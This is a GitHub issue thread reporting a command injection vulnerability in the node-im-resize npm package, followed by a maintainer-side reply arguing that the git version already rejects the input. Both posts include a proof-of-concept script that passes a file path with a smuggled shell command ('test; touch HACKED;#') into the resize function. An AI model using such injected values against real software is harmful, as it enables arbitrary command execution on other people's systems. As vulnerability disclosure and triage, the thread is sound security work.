search

Turistforeningen / node-im-resize

Efficient image resize with multiple versions support
MIT License
20 stars 13 forks source link

huntr.dev - Command Injection #20

Open huntr-helper opened 4 years ago

huntr-helper commented 4 years ago

This issue has been generated on-behalf of Mik317 (https://huntr.dev/app/users/Mik317)

Vulnerability Description

The issue occurs because a user input is formatted inside a command that will be executed without any check. The issue arises here: https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L115

Steps To Reproduce:

  1. Create the following PoC file: 
    
// poc.js
var resize = require('im-resize');

var image = { path: 'test; touch HACKED;#', width: 5184, height: 2623 };

var output = { versions: [{ suffix: '-thumb', maxHeight: 150, maxWidth: 150, aspect: "3:2" },{ suffix: '-square', maxWidth: 200, aspect: "1:1" }] };

resize(image, output, function(error){console.log()});

2. Check there aren't files called `HACKED` 
3. Execute the following commands in another terminal:

```bash
npm i im-resize # Install affected module
node poc.js #  Run the PoC
  1. Recheck the files: now HACKED has been created

Bug Bounty

We have opened up a bounty for this issue on our bug bounty platform. Want to solve this vulnerability and get rewarded 💰? Go to https://huntr.dev/

alromh87 commented 4 years ago

NPM version is vulnerable but I this bug is a false positive for git version, since code injection is mitigated in:

https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L10

In commit de624dacf6a50e39fe3472af1414d44937ce1f03 of Feb 3

Instead of using npm version test should be executed against git version, after cloning like:

// poc.js
//var resize = require('im-resize');
var resize = require('./');

var image = {
  path: 'test; touch HACKED;#',
  width: 5184,
  height: 2623
};

var output = {
  versions: [{
    suffix: '-thumb',
    maxHeight: 150,
    maxWidth: 150,
    aspect: "3:2"
  },{
    suffix: '-square',
    maxWidth: 200,
    aspect: "1:1"
  }]
};

resize(image, output, function(error){console.log()});

execute by:

npm i aspectratio # Install requiered module
node poc.js #  Run the PoC

Will yield:

Input Validation failed, Suspicious Characters found

stopping execution and avoiding code injection

exec is called in https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L13 so trying to call directly https://github.com/Turistforeningen/node-im-resize/blob/master/index.js#L115 will produce a string and not code execution.

PS. I would suggest granting the bounty considering the time it took me to test and document this as well as helping improve huntr bug quality